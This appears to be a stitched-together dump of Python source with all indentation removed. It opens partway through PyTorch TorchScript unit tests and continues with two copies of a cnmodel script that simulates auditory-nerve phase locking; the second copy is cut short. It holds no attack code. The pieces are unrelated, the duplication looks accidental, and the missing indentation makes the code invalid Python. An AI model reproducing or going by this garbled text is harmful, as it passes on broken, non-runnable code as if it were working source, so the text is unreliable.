print(f"format blank") # noqa F541
hi = 'hi'
print(f"stuff before {hi}")
print(f"{hi} stuff after")
return x + 1
x = torch.arange(4., requires_grad=True)
# TODO: Add support for f-strings in string parser frontend
# self.checkScript(func, [x], optimize=True, capture_output=True)
with self.capture_stdout() as captured:
out = func(x)
scripted = torch.jit.script(func)
with self.capture_stdout() as captured_script:
out_script = func(x)
self.assertEqual(out, out_script)
self.assertEqual(captured, captured_script)
@unittest.skipIf(sys.version_info[:2] < (3, 7), "`dataclasses` module not present on < 3.7")
def test_dataclass_error(self):
from dataclasses import dataclass
@dataclass
class NormalizationInfo(object):
mean: float = 0.0
def compute(self, total_rows):
return self.mean
def fn():
return NormalizationInfo(1, 2, 3, 4, 5)
with self.assertRaisesRegex(OSError, "NormalizationInfo"):
torch.jit.script(fn)
def test_optional_dict_construct(self):
class M(torch.nn.Module):
def use(self, buffer: Dict[str, Optional[torch.Tensor]]):
return buffer["prev_key"]
def forward(self, x):
prev_key = torch.rand(2, 3)
next_key = torch.rand(2, 3)
saved_state: Dict[str, Optional[torch.Tensor]] = {
"prev_key": prev_key,
"next_key": next_key,
}
return self.use(saved_state)
self.checkModule(M(), (torch.rand(2, 2),))
def test_kwarg_support(self):
with self.assertRaisesRegex(torch.jit.frontend.NotSupportedError, "variable number of arguments"):
class M(torch.nn.Module):
def forward(self, *, n_tokens: int, device_name: str = 2):
pass
torch.jit.script(M())
class M(torch.nn.Module):
def forward(self, *, n_tokens: int, device_name: str):
return n_tokens, device_name
sm = torch.jit.script(M())
with self.assertRaisesRegex(RuntimeError, "missing value for argument 'n_tokens'"):
sm()
input = (3, 'hello')
self.assertEqual(sm(*input), input)
def test_named_tuple(self):
class FeatureVector(NamedTuple):
float_features: float
sequence_features: List[float]
time_since_first: float
@torch.jit.script
def foo(x) -> float:
fv = FeatureVector(3.0, [3.0], 3.0) # noqa
rv = fv.float_features
for val in fv.sequence_features:
rv += val
rv *= fv.time_since_first
return rv
self.assertEqual(foo(torch.rand(3, 4)), 18.0)
def test_named_tuple_constant(self):
class Tup(NamedTuple):
a: int
b: int
@torch.jit.script
def foo():
return Tup(1, 2)
self.assertEqual(foo(), Tup(1, 2))
def test_dict_preserves_order(self):
def dict_ordering():
a : Dict[int, int] = {}
for i in range(1000):
a[i] = i + 1
return a
self.checkScript(dict_ordering, ())
di = torch.jit.script(dict_ordering)()
res = list(di.items())
for i in range(1000):
key, value = res[i]
self.assertTrue(key == i and value == i + 1)
def test_list_unification_hint(self):
with self.assertRaisesRegex(RuntimeError, "Expected a List type hint"):
@torch.jit.script
def x():
b : int = [2, 3]
return b
def test_return_named_tuple(self):
class FeatureVector(NamedTuple):
float_features: float
sequence_features: List[float]
time_since_first: float
@torch.jit.script
def foo(x):
fv = FeatureVector(3.0, [3.0], 3.0)
return fv
out = foo(torch.rand(3, 4))
out = foo(torch.rand(3, 4))
self.assertEqual(out.float_features, 3.0)
self.assertEqual(out.sequence_features, [3.0])
self.assertEqual(out.time_since_first, 3.0)
def test_named_tuple_as_attr(self):
class Config(NamedTuple):
size: int
class MyMod(nn.Module):
configs: Dict[int, Config]
def __init__(self, configs):
super().__init__()
self.configs = configs
def forward(self, x):
for _id, config in self.configs.items():
x += config.size
return x
s = torch.jit.script(MyMod({0: Config(size=16)}))
def test_types_as_values(self):
def fn(m: torch.Tensor) -> torch.device:
return m.device
self.checkScript(fn, [torch.randn(2, 2)])
GG = namedtuple('GG', ['f', 'g'])
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
@torch.jit.ignore
def foo(self, x, z):
# type: (Tensor, Tensor) -> Tuple[GG, GG]
return GG(x, z), GG(x, z)
def forward(self, x, z):
return self.foo(x, z)
foo = torch.jit.script(Foo())
y = foo(torch.randn(2, 2), torch.randn(2, 2))
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
@torch.jit.ignore
def foo(self, x, z) -> Tuple[GG, GG]:
return GG(x, z)
def forward(self, x, z):
return self.foo(x, z)
foo = torch.jit.script(Foo())
y = foo(torch.randn(2, 2), torch.randn(2, 2))
def test_named_tuple_resolution(self):
class TheType(NamedTuple):
t: int
class MyModule(types.ModuleType):
def __init__(self):
super(MyModule, self).__init__('MyModule')
def __getattr__(self, attr):
return TheType
some_module = MyModule()
def fn() -> some_module.Type:
return some_module.Type(1)
self.checkScript(fn, [])
def test_ignore_with_types(self):
@torch.jit.ignore
def fn(x: Dict[str, Optional[torch.Tensor]]):
return x + 10
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
def forward(self, in_batch: Dict[str, Optional[torch.Tensor]]) -> torch.Tensor:
self.dropout_modality(in_batch)
fn(in_batch)
return torch.tensor(1)
@torch.jit.ignore
def dropout_modality(self, in_batch: Dict[str, Optional[torch.Tensor]]) -> Dict[str, Optional[torch.Tensor]]:
return in_batch
sm = torch.jit.script(M())
FileCheck().check("dropout_modality").check("in_batch").run(str(sm.graph))
def test_python_callable(self):
class MyPythonClass(object):
@torch.jit.ignore
def __call__(self, *args) -> str:
return str(type(args[0]))
the_class = MyPythonClass()
@torch.jit.script
def fn(x):
return the_class(x)
# This doesn't involve the string frontend, so don't use checkScript
x = torch.ones(2)
self.assertEqual(fn(x), the_class(x))
def test_bad_types(self):
@torch.jit.ignore
def fn(my_arg):
return my_arg + 10
with self.assertRaisesRegex(RuntimeError, "argument 'my_arg'"):
@torch.jit.script
def other_fn(x):
return fn('2')
def test_named_tuple_slice_unpack(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
@torch.jit.script
def foo(a : int, b : float, c : List[int]):
tup = MyCoolNamedTuple(a, b, c) # noqa
my_a, my_b, my_c = tup
return tup[:1], my_a, my_c
self.assertEqual(foo(3, 3.5, [6]), ((3,), 3, [6]))
def test_named_tuple_lower(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
@torch.jit.script
def foo(a : int):
tup = MyCoolNamedTuple(a, 3.14, [9]) # noqa
return tup
FileCheck().check('TupleConstruct').run(foo.graph)
torch._C._jit_pass_lower_all_tuples(foo.graph)
FileCheck().check_not('TupleConstruct').run(foo.graph)
def test_named_tuple_type_annotation(self):
global MyCoolNamedTuple # see [local resolution in python]
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
@torch.jit.script
def foo(x : MyCoolNamedTuple) -> MyCoolNamedTuple:
return x
mnt = MyCoolNamedTuple(42, 420.0, [666])
self.assertEqual(foo(mnt), mnt)
def test_named_tuple_wrong_types(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
with self.assertRaisesRegex(RuntimeError, "Expected a value of type 'int' for argument 'a'"
" but instead found type 'str'"):
@torch.jit.script
def foo():
tup = MyCoolNamedTuple('foo', 'bar', 'baz') # noqa
return tup
def test_named_tuple_kwarg_construct(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
@torch.jit.script
def foo():
tup = MyCoolNamedTuple(c=[1, 2, 3], b=3.5, a=9) # noqa
return tup
tup = foo()
self.assertEqual(tup.a, 9)
self.assertEqual(tup.b, 3.5)
self.assertEqual(tup.c, [1, 2, 3])
def test_named_tuple_default_error(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int] = [3, 4, 5]
with self.assertRaisesRegex(RuntimeError, 'Default values are currently not supported'):
@torch.jit.script
def foo():
tup = MyCoolNamedTuple(c=[1, 2, 3], b=3.5, a=9) # noqa
return tup
@unittest.skipIf(True, "broken while these tests were not in CI")
def test_named_tuple_serialization(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
class MyMod(torch.jit.ScriptModule):
@torch.jit.script_method
def forward(self):
return MyCoolNamedTuple(3, 3.5, [3, 4, 5])
mm = MyMod()
mm.save('foo.zip')
torch.testing._internal.jit_utils.clear_class_registry()
loaded = torch.jit.load('foo.zip')
out = mm()
out_loaded = loaded()
for name in ['a', 'b', 'c']:
self.assertEqual(getattr(out_loaded, name), getattr(out, name))
def test_type_annotate_py3(self):
def fn():
a : List[int] = []
b : torch.Tensor = torch.ones(2, 2)
c : Optional[torch.Tensor] = None
d : Optional[torch.Tensor] = torch.ones(3, 4)
for _ in range(10):
a.append(4)
c = torch.ones(2, 2)
d = None
return a, b, c, d
self.checkScript(fn, ())
def wrong_type():
wrong : List[int] = [0.5]
return wrong
with self.assertRaisesRegex(RuntimeError, "Lists must contain only a single type"):
torch.jit.script(wrong_type)
def test_subexpression_List_Future(self):
@torch.jit.script
def fn(x: List[torch.jit.Future[int]]) -> torch.jit.Future[int]:
return x[0]
FileCheck().check('Future[int]').check('Future[int]').run(fn.graph)
def test_subexpression_Future_annotate(self):
@torch.jit.script
def fn() -> torch.jit.Future[int]:
x: List[torch.jit.Future[int]] = []
return x[0]
FileCheck().check("Future[int][]").run(fn.graph)
def test_future_isinstance(self):
@torch.jit.script
def fn(x: Any) -> torch.jit.Future[int]:
assert isinstance(x, jit.Future[int])
return x
FileCheck().check("Future[int]").run(fn.graph)
def test_subexpression_Tuple_int_int_Future(self):
@torch.jit.script
def fn(x: Tuple[int, int, torch.jit.Future[int]]) -> Tuple[int, torch.jit.Future[int]]:
return x[0], x[2]
FileCheck().check('(int, int, Future[int])').check('(int, Future[int])').run(fn.graph)
def test_subexpression_Dict_int_Future(self):
@torch.jit.script
def fn(x: Dict[int, torch.jit.Future[int]], y: int) -> torch.jit.Future[int]:
return x[y]
FileCheck().check('Dict(int, Future(int))').check('Future[int]').run(fn.graph)
def test_subexpression_Optional(self):
@torch.jit.script
def fn(x: Optional[Dict[int, torch.jit.Future[int]]]) -> Optional[torch.jit.Future[int]]:
if x is not None:
return x[0]
else:
return None
FileCheck().check('Dict(int, Future(int))?').run(fn.graph)
def test_unimported_type_resolution(self):
# verify fallback from the python resolver to the c++ resolver
@ torch.jit.script
def fn(x):
# type: (number) -> number
return x + 1
FileCheck().check('Scalar').run(fn.graph)
def test_parser_bug(self):
def parser_bug(o: Optional[torch.Tensor]):
pass
def test_mismatched_annotation(self):
with self.assertRaisesRegex(RuntimeError, 'annotated with type'):
@torch.jit.script
def foo():
x : str = 4
return x
def test_reannotate(self):
with self.assertRaisesRegex(RuntimeError, 'declare and annotate'):
@torch.jit.script
def foo():
x = 5
if True:
x : Optional[int] = 7
def test_module_inplace_construct(self):
class M(nn.Module):
def __init__(self, start: int):
super().__init__()
self.linear = nn.Linear(3, 3)
self.attribute = start
self.parameter = nn.Parameter(torch.tensor(3, dtype=torch.float))
def method(self) -> int:
return self.attribute
@torch.jit.unused
def unused_method(self):
return self.attribute + self.attribute
def forward(self, x):
return self.linear(self.linear(x))
class N(nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(4, 4)
@torch.jit.ignore
def ignored_method(self, x):
return x
def forward(self, x):
return self.linear(x)
m = torch.jit.script(M(3))
n = torch.jit.script(N())
n._reconstruct(m._c)
inp = torch.rand((3))
# Check that both modules produce the same output.
with torch.no_grad():
m_out = m(inp)
n_out = n(inp)
self.assertEqual(m_out, n_out)
# Check that ignored method is still intact.
self.assertEqual(inp, n.ignored_method(inp))
def test_export_opnames_interface(self):
global OneTwoModule
@torch.jit.interface
class OneTwoModule(nn.Module):
def one(self, x, y):
# type: (Tensor, Tensor) -> Tensor
pass
def two(self, x):
# type: (Tensor) -> Tensor
pass
def forward(self, x):
# type: (Tensor) -> Tensor
pass
class FooMod(nn.Module):
def one(self, x, y):
# type: (Tensor, Tensor) -> Tensor
return x + y
def two(self, x):
# type: (Tensor) -> Tensor
return 2 * x
def forward(self, x):
# type: (Tensor) -> Tensor
return self.one(self.two(x), x)
class BarMod(nn.Module):
def one(self, x, y):
# type: (Tensor, Tensor) -> Tensor
return x * y
def two(self, x):
# type: (Tensor) -> Tensor
return 2 / x
def forward(self, x):
# type: (Tensor) -> Tensor
return self.two(self.one(x, x))
class M(nn.Module):
sub : OneTwoModule
def __init__(self):
super(M, self).__init__()
self.sub = BarMod()
def forward(self, x):
# type: (Tensor) -> Tensor
return self.sub.forward(x)
def use_module_interface(mod_list: List[OneTwoModule], x: torch.Tensor):
return mod_list[0].forward(x) + mod_list[1].forward(x)
scripted_M_mod = torch.jit.script(M())
# Temporarily test empty output because lite interpreter does not support interface call
# Replace it with the issubset call when interface call is supported.
self.assertTrue(len(torch.jit.export_opnames(scripted_M_mod)) == 0)
# self.assertTrue(set(['aten::mul.Scalar', 'aten::mul.Tensor', 'aten::reciprocal']).issubset(
# set(torch.jit.export_opnames(scripted_M_mod))))
scripted_M_mod.sub = torch.jit.script(FooMod())
self.assertTrue(len(torch.jit.export_opnames(scripted_M_mod)) == 0)
# self.assertTrue(set(['aten::add.Tensor', 'aten::mul.Scalar']).issubset(
# set(torch.jit.export_opnames(scripted_M_mod))))
if __name__ == '__main__':
run_tests()
|
"""
test_sgc_input_phaselocking.py
Test phase locking from an input sgc to a target cell type. Runs simulations
with AN input, and plots the results, including PSTH and phase histogram.
usage: test_sgc_input_phaselocking.py [-h]
[-c {bushy,tstellate,octopus,dstellate}]
[-S {tone,SAM,clicks}]
[-s {guineapig,rat,mouse}]
test sgc input phaselocking
optional arguments:
-h, --help show this help message and exit
-c {bushy,tstellate,octopus,dstellate}, --celltype {bushy,tstellate,octopus,dstellate}
cell type
-S {tone,SAM,clicks}, --stimulus {tone,SAM,clicks}
stimulus type
-s {guineapig,rat,mouse}, --species {guineapig,rat,mouse}
species
Note: Not all combinations of inputs are valid (not all cell types are
known for each species)
"""
import sys
import numpy as np
import argparse
from neuron import h
import pyqtgraph as pg
from cnmodel.protocols import Protocol
from cnmodel import cells
from cnmodel.util import sound
import cnmodel.util.pynrnutilities as PU
from cnmodel import data
class SGCInputTestPL(Protocol):
def set_cell(self, cell="bushy"):
self.cell = cell
def run(
self, args, temp=34.0, dt=0.025, seed=575982035, dB=None,
):
if self.cell == "bushy":
postCell = cells.Bushy.create(species=args.species)
elif self.cell == "tstellate":
postCell = cells.TStellate.create(species=args.species)
elif self.cell == "octopus":
postCell = cells.Octopus.create(species=args.species)
elif self.cell == "dstellate":
postCell = cells.DStellate.create(species=args.species)
else:
raise ValueError(
"cell %s is not yet implemented for phaselocking" % self.cell
)
self.post_cell = postCell
self.species = args.species
self.stimulus = args.stimulus
self.run_duration = 1.0 # in seconds
self.pip_duration = 0.8 # in seconds
self.pip_start = [0.02] # in seconds
self.Fs = 100e3 # in Hz
self.f0 = args.CF # stimulus in Hz
self.cf = args.CF # SGCs in Hz
self.fMod = args.fmod # mod freq, Hz
self.dMod = args.dmod # % mod depth, percentage
if dB is None:
self.dbspl = args.dB
else:
self.dbspl = dB
if self.stimulus == "SAM":
self.stim = sound.SAMTone(
rate=self.Fs,
duration=self.run_duration,
f0=self.f0,
fmod=self.fMod,
dmod=self.dMod,
dbspl=self.dbspl,
ramp_duration=2.5e-3,
pip_duration=self.pip_duration,
pip_start=self.pip_start,
)
self.vs_freq = self.fMod
if self.stimulus == "tone":
self.f0 = 1000.0
self.cf = 1000.0
self.stim = sound.TonePip(
rate=self.Fs,
duration=self.run_duration,
f0=self.f0,
dbspl=self.dbspl,
ramp_duration=2.5e-3,
pip_duration=self.pip_duration,
pip_start=self.pip_start,
)
self.vs_freq = self.f0
if self.stimulus == "clicks":
self.click_rate = 0.020 # msec
self.stim = sound.ClickTrain(
rate=self.Fs,
duration=self.run_duration,
dbspl=self.dbspl,
click_starts=np.linspace(
0.01,
self.run_duration - 0.01,
int((self.run_duration) / self.click_rate),
),
click_duration=100.0e-6,
# click_interval=self.click_rate, nclicks=int((self.run_duration-0.01)/self.click_rate),
ramp_duration=2.5e-3,
)
n_sgc = data.get(
"convergence", species=self.species, post_type=postCell.celltype, pre_type="sgc"
)[0]
self.n_sgc = int(np.round(n_sgc))
self.pre_cells = []
self.synapses = []
j = 0
for k in range(self.n_sgc):
seed = seed + k
preCell = cells.DummySGC(cf=self.cf, sr=2)
synapse = preCell.connect(postCell)
for i in range(synapse.terminal.n_rzones):
self["xmtr%03d" % j] = synapse.terminal.relsite._ref_XMTR[i]
j = j + 1
synapse.terminal.relsite.Dep_Flag = False
preCell.set_sound_stim(self.stim, seed=seed)
self.pre_cells.append(preCell)
self.synapses.append(synapse)
self["vm"] = postCell.soma(0.5)._ref_v
# self['prevm'] = preCell.soma(0.5)._ref_v
self["t"] = h._ref_t
postCell.cell_initialize()
h.tstop = 1e3 * self.run_duration # duration of a run
h.celsius = temp
h.dt = dt
self.custom_init()
h.run()
def window_spikes(self, spiketrain):
phasewin = [
self.pip_start[0] + 0.25 * self.pip_duration,
self.pip_start[0] + self.pip_duration,
]
spkin = spiketrain[np.where(spiketrain > phasewin[0] * 1e3)]
spikesinwin = spkin[np.where(spkin <= phasewin[1] * 1e3)]
return spikesinwin
def compute_vs(self):
self.post_spikes = PU.findspikes(self["t"], self["vm"], -30.0)
self.post_spikes_win = self.window_spikes(self.post_spikes)
self.an_spikes_win = self.window_spikes(self.pre_cells[0]._spiketrain) # just sample one...
# set freq for VS calculation
if self.stimulus == "tone":
f0 = self.f0
print(
"Tone: f0=%.3f at %3.1f dbSPL, cell CF=%.3f"
% (self.f0, self.dbspl, self.cf)
)
if self.stimulus == "SAM":
f0 = self.fMod
print(
(
"SAM Tone: f0=%.3f at %3.1f dbSPL, fMod=%3.1f dMod=%5.2f, cell CF=%.3f"
% (self.f0, self.dbspl, self.fMod, self.dMod, self.cf)
)
)
if self.stimulus == "clicks":
f0 = 1.0 / self.click_rate
print(
"Clicks: interval %.3f at %3.1f dbSPL, cell CF=%.3f "
% (self.click_rate, self.dbspl, self.cf)
)
self.an_vs = PU.vector_strength(self.an_spikes_win*1e-3, f0)
andiff = self.an_spikes_win*1e-3
print(
"AN Vector Strength at %.1f: %7.3f, d=%.2f (us) Rayleigh: %7.3f p = %.3e n = %d"
% (f0, self.an_vs["r"], self.an_vs["d"] * 1e6, self.an_vs["R"], self.an_vs["p"], self.an_vs["n"])
)
self.post_cell_vs = PU.vector_strength(self.post_spikes_win*1e-3, f0)
print(
"%s Vector Strength: %7.3f, d=%.2f (us) Rayleigh: %7.3f p = %.3e n = %d"
% (self.cell, self.post_cell_vs["r"], self.post_cell_vs["d"] * 1e6,
self.post_cell_vs["R"], self.post_cell_vs["p"], self.post_cell_vs["n"])
)
def show(self):
self.compute_vs()
self.win = pg.GraphicsWindow()
p1 = self.win.addPlot(title="stim", row=0, col=0)
p1.plot(self.stim.time * 1000, self.stim.sound)
p1.setXLink(p1)
p2 = self.win.addPlot(title="AN spikes", row=1, col=0)
vt = pg.VTickGroup(self.pre_cells[0]._spiketrain)
p2.addItem(vt)
p2.setXLink(p1)
p3 = self.win.addPlot(title="%s Spikes" % self.cell, row=2, col=0)
bspktick = pg.VTickGroup(self.post_spikes)
p3.addItem(bspktick)
p3.setXLink(p1)
p4 = self.win.addPlot(title="%s Vm" % self.cell, row=3, col=0)
p4.plot(self["t"], self["vm"])
p4.setXLink(p1)
p5 = self.win.addPlot(title="xmtr", row=0, col=1)
j = 0
for k in range(self.n_sgc):
synapse = self.synapses[k]
for i in range(synapse.terminal.n_rzones):
p5.plot(self["t"], self["xmtr%03d" % j], pen=(i, 15))
j = j + 1
p5.setXLink(p1)
p6 = self.win.addPlot(title="AN phase", row=1, col=1)
# phasewin = [
# self.pip_start[0] + 0.25 * self.pip_duration,
# self.pip_start[0] + self.pip_duration,
# ]
print("\nCell type: %s" % self.cell)
print("Stimulus: ")
(hist, binedges) = np.histogram(self.an_vs["ph"])
p6.plot(
binedges, hist, stepMode=True, fillBrush=(100, 100, 255, 150), fillLevel=0
)
p6.setXRange(0.0, 2 * np.pi)
p7 = self.win.addPlot(title="%s phase" % self.cell, row=2, col=1)
(hist, binedges) = np.histogram(self.post_cell_vs["ph"])
p7.plot(
binedges, hist, stepMode=True, fillBrush=(255, 100, 100, 150), fillLevel=0
)
p7.setXRange(0.0, 2 * np.pi)
p7.setXLink(p6)
self.win.show()
def main():
parser = argparse.ArgumentParser(description="test sgc input phaselocking")
parser.add_argument(
"-c",
"--celltype",
type=str,
choices=["bushy", "tstellate", "octopus", "dstellate"],
default="bushy",
help="cell type",
)
parser.add_argument(
"--species",
type=str,
choices=["guineapig", "mouse", "rat"],
default="mouse",
help="Species",
)
parser.add_argument(
"-S",
"--stimulus",
type=str,
choices=["tone", "SAM", "clicks",],
default="tone",
help="stimulus type",
)
parser.add_argument(
"--dB",
"--dBSPL",
type=float,
default=60.,
help="Sound pressure level, SPL",
)
parser.add_argument(
"--dmod",
type=float,
default=100.,
help="Modulation depth for SAM (percent)",
)
parser.add_argument(
"--fmod",
type=float,
default=200.0,
help="Modulation Frequency for SAM (Hz)",
)
parser.add_argument(
"--CF",
type=float,
default=16000.,
help="Carrier Frequency for SAM (Hz)",
)
parser.add_argument(
"--RI",
action="store_true",
default=False,
dest="RI",
help="Run Rate-intensity with these parameters",
)
args = parser.parse_args()
prot = SGCInputTestPL()
prot.set_cell(args.celltype)
if not args.RI:
prot.run(args) # stimulus=args.stimulus, species=args.species)
prot.show()
else:
an_vs = []
post_vs = []
dbrange = np.linspace(0, 70, 15)
for db in dbrange:
prot.run(args, dB=db)
prot.compute_vs()
an_vs.append(prot.an_vs["r"])
post_vs.append(prot.post_cell_vs["r"])
print(f" {"dB":3s} {"vsan":6s} {"vsbu":6s}")
for i, db in enumerate(dbrange):
print(f" {int(db):3d} {an_vs[i]:5.2f} {post_vs[i]:5.2f}")
import sys
if sys.flags.interactive == 0:
pg.QtGui.QApplication.exec_()
if __name__ == "__main__":
main()
| """
test_sgc_input_phaselocking.py
Test phase locking from an input sgc to a target cell type. Runs simulations
with AN input, and plots the results, including PSTH and phase histogram.
usage: test_sgc_input_phaselocking.py [-h]
[-c {bushy,tstellate,octopus,dstellate}]
[-S {tone,SAM,clicks}]
[-s {guineapig,rat,mouse}]
test sgc input phaselocking
optional arguments:
-h, --help show this help message and exit
-c {bushy,tstellate,octopus,dstellate}, --celltype {bushy,tstellate,octopus,dstellate}
cell type
-S {tone,SAM,clicks}, --stimulus {tone,SAM,clicks}
stimulus type
-s {guineapig,rat,mouse}, --species {guineapig,rat,mouse}
species
Note: Not all combinations of inputs are valid (not all cell types are
known for each species)
"""
import sys
import numpy as np
import argparse
from neuron import h
import pyqtgraph as pg
from cnmodel.protocols import Protocol
from cnmodel import cells
from cnmodel.util import sound
import cnmodel.util.pynrnutilities as PU
from cnmodel import data
class SGCInputTestPL(Protocol):
def set_cell(self, cell="bushy"):
self.cell = cell
def run(
self, args, temp=34.0, dt=0.025, seed=575982035, dB=None,
):
if self.cell == "bushy":
postCell = cells.Bushy.create(species=args.species)
elif self.cell == "tstellate":
postCell = cells.TStellate.create(species=args.species)
elif self.cell == "octopus":
postCell = cells.Octopus.create(species=args.species)
elif self.cell == "dstellate":
postCell = cells.DStellate.create(species=args.species)
else:
raise ValueError(
"cell %s is not yet implemented for phaselocking" % self.cell
)
self.post_cell = postCell
self.species = args.species
self.stimulus = args.stimulus
self.run_duration = 1.0 # in seconds
self.pip_duration = 0.8 # in seconds
self.pip_start = [0.02] # in seconds
self.Fs = 100e3 # in Hz
self.f0 = args.CF # stimulus in Hz
self.cf = args.CF # SGCs in Hz
self.fMod = args.fmod # mod freq, Hz
self.dMod = args.dmod # % mod depth, percentage
if dB is None:
self.dbspl = args.dB
else:
self.dbspl = dB
if self.stimulus == "SAM":
self.stim = sound.SAMTone(
rate=self.Fs,
duration=self.run_duration,
f0=self.f0,
fmod=self.fMod,
dmod=self.dMod,
dbspl=self.dbspl,
ramp_duration=2.5e-3,
pip_duration=self.pip_duration,
pip_start=self.pip_start,
)
self.vs_freq = self.fMod
if self.stimulus == "tone":
self.f0 = 1000.0
self.cf = 1000.0
self.stim = sound.TonePip(
rate=self.Fs,
duration=self.run_duration,
f0=self.f0,
dbspl=self.dbspl,
ramp_duration=2.5e-3,
pip_duration=self.pip_duration,
pip_start=self.pip_start,
)
self.vs_freq = self.f0
if self.stimulus == "clicks":
self.click_rate = 0.020 # msec
self.stim = sound.ClickTrain(
rate=self.Fs,
duration=self.run_duration,
dbspl=self.dbspl,
click_starts=np.linspace(
0.01,
self.run_duration - 0.01,
int((self.run_duration) / self.click_rate),
),
click_duration=100.0e-6,
# click_interval=self.click_rate, nclicks=int((self.run_duration-0.01)/self.click_rate),
ramp_duration=2.5e-3,
)
n_sgc = data.get(
"convergence", species=self.species, post_type=postCell.celltype, pre_type="sgc"
)[0]
self.n_sgc = int(np.round(n_sgc))
self.pre_cells = []
self.synapses = []
j = 0
for k in range(self.n_sgc):
seed = seed + k
preCell = cells.DummySGC(cf=self.cf, sr=2)
synapse = preCell.connect(postCell)
for i in range(synapse.terminal.n_rzones):
self["xmtr%03d" % j] = synapse.terminal.relsite._ref_XMTR[i]
j = j + 1
synapse.terminal.relsite.Dep_Flag = False
preCell.set_sound_stim(self.stim, seed=seed)
self.pre_cells.append(preCell)
self.synapses.append(synapse)
self["vm"] = postCell.soma(0.5)._ref_v
# self['prevm'] = preCell.soma(0.5)._ref_v
self["t"] = h._ref_t
postCell.cell_initialize()
h.tstop = 1e3 * self.run_duration # duration of a run
h.celsius = temp
h.dt = dt
self.custom_init()
h.run()
def window_spikes(self, spiketrain):
phasewin = [
self.pip_start[0] + 0.25 * self.pip_duration,
self.pip_start[0] + self.pip_duration,
]
spkin = spiketrain[np.where(spiketrain > phasewin[0] * 1e3)]
spikesinwin = spkin[np.where(spkin <= phasewin[1] * 1e3)]
return spikesinwin
def compute_vs(self):
self.post_spikes = PU.findspikes(self["t"], self["vm"], -30.0)
self.post_spikes_win = self.window_spikes(self.post_spikes)
self.an_spikes_win = self.window_spikes(self.pre_cells[0]._spiketrain) # just sample one...
# set freq for VS calculation
if self.stimulus == "tone":
f0 = self.f0
print(
"Tone: f0=%.3f at %3.1f dbSPL, cell CF=%.3f"
% (self.f0, self.dbspl, self.cf)
)
if self.stimulus == "SAM":
f0 = self.fMod
print(
(
"SAM Tone: f0=%.3f at %3.1f dbSPL, fMod=%3.1f dMod=%5.2f, cell CF=%.3f"
% (self.f0, self.dbspl, self.fMod, self.dMod, self.cf)
)
)
if self.stimulus == "clicks":
f0 = 1.0 / self.click_rate
print(
"Clicks: interval %.3f at %3.1f dbSPL, cell CF=%.3f "
% (self.click_rate, self.dbspl, self.cf)
)
self.an_vs = PU.vector_strength(self.an_spikes_win*1e-3, f0)
andiff = self.an_spikes_win*1e-3
print(
"AN Vector Strength at %.1f: %7.3f, d=%.2f (us) Rayleigh: %7.3f p = %.3e n = %d"
% (f0, self.an_vs["r"], self.an_vs["d"] * 1e6, self.an_vs["R"], self.an_vs["p"], self.an_vs["n"])
)
self.post_cell_vs = PU.vector_strength(self.post_spikes_win*1e-3, f0)
print(
"%s Vector Strength: %7.3f, d=%.2f (us) Rayleigh: %7.3f p = %.3e n = %d"
% (self.cell, self.post_cell_vs["r"], self.post_cell_vs["d"] * 1e6,
self.post_cell_vs["R"], self.post_cell_vs["p"], self.post_cell_vs["n"])
)
def show(self):
self.compute_vs()
self.win = pg.GraphicsWindow()
p1 = self.win.addPlot(title="stim", row=0, col=0)
p1.plot(self.stim.time * 1000, self.stim.sound)
p1.setXLink(p1)
p2 = self.win.addPlot(title="AN spikes", row=1, col=0)
vt = pg.VTickGroup(self.pre_cells[0]._spiketrain)
p2.addItem(vt)
p2.setXLink(p1)
p3 = self.win.addPlot(title="%s Spikes" % self.cell, row=2, col=0)
bspktick = pg.VTickGroup(self.post_spikes)
p3.addItem(bspktick)
p3.setXLink(p1)
p4 = self.win.addPlot(title="%s Vm" % self.cell, row=3, col=0)
p4.plot(self["t"], self["vm"])
p4.setXLink(p1)
p5 = self.win.addPlot(title="xmtr", row=0, col=1)
j = 0
for k in range(self.n_sgc):
synapse = self.synapses[k]
for i in range(synapse.terminal.n_rzones):
p5.plot(self["t"], self["xmtr%03d" % j], pen=(i, 15))
j = j + 1
p5.setXLink(p1)
p6 = self.win.addPlot(title="AN phase", row=1, col=1)
# phasewin = [
# self.pip_start[0] + 0.25 * self.pip_duration,
# self.pip_start[0] + self.pip_duration,
# ]
print("\nCell type: %s" % self.cell)
print("Stimulus: ")
(hist, binedges) = np.histogram(self.an_vs["ph"])
p6.plot(
binedges, hist, stepMode=True, fillBrush=(100, 100, 255, 150), fillLevel=0
)
p6.setXRange(0.0, 2 * np.pi)
p7 = self.win.addPlot(title="%s phase" % self.cell, row=2, col=1)
(hist, binedges) = np.histogram(self.post_cell_vs["ph"])
p7.plot(
binedges, hist, stepMode=True, fillBrush=(255, 100, 100, 150), fillLevel=0
)
p7.setXRange(0.0, 2 * np.pi)
p7.setXLink(p6)
self.win.show()
def main():
parser = argparse.ArgumentParser(description="test sgc input phaselocking")
parser.add_argument(
"-c",
"--celltype",
type=str,
choices=["bushy", "tstellate", "octopus", "dstellate"],
default="bushy",
help="cell type",
)
parser.add_argument(
"--species",
type=str,
choices=["guineapig", "mouse", "rat"],
default="mouse",
help="Species",
)
parser.add_argument(
"-S",
"--stimulus",
type=str,
choices=["tone", "SAM", "clicks",],
default="tone",
help="stimulus type",
)
parser.add_argument(
"--dB",
"--dBSPL",
type=float,
default=60.,
help="Sound pressure level, SPL",
)
parser.add_argument(
"--dmod",
type=float,
default=100.,
help="Modulation depth for SAM (percent)",
)
parser.add_argument(
"--fmod",
type=float,
default=200.0,
help="Modulation Frequency for SAM (Hz)",
)
parser.add_argument(
"--CF",
type=float,
default=16000.,
help="Carrier Frequency for SAM (Hz)",
)
parser.add_argument(
"--RI",
action="store_true",
default=False,
dest="RI",
help="Run Rate-intensity with these parameters",
)
args = parser.parse_args()
prot = SGCInputTestPL()
prot.set_cell(args.celltype)
if not args.RI:
prot.run(args) # stimulus=args.stimulus, species=args.species)
prot.show()
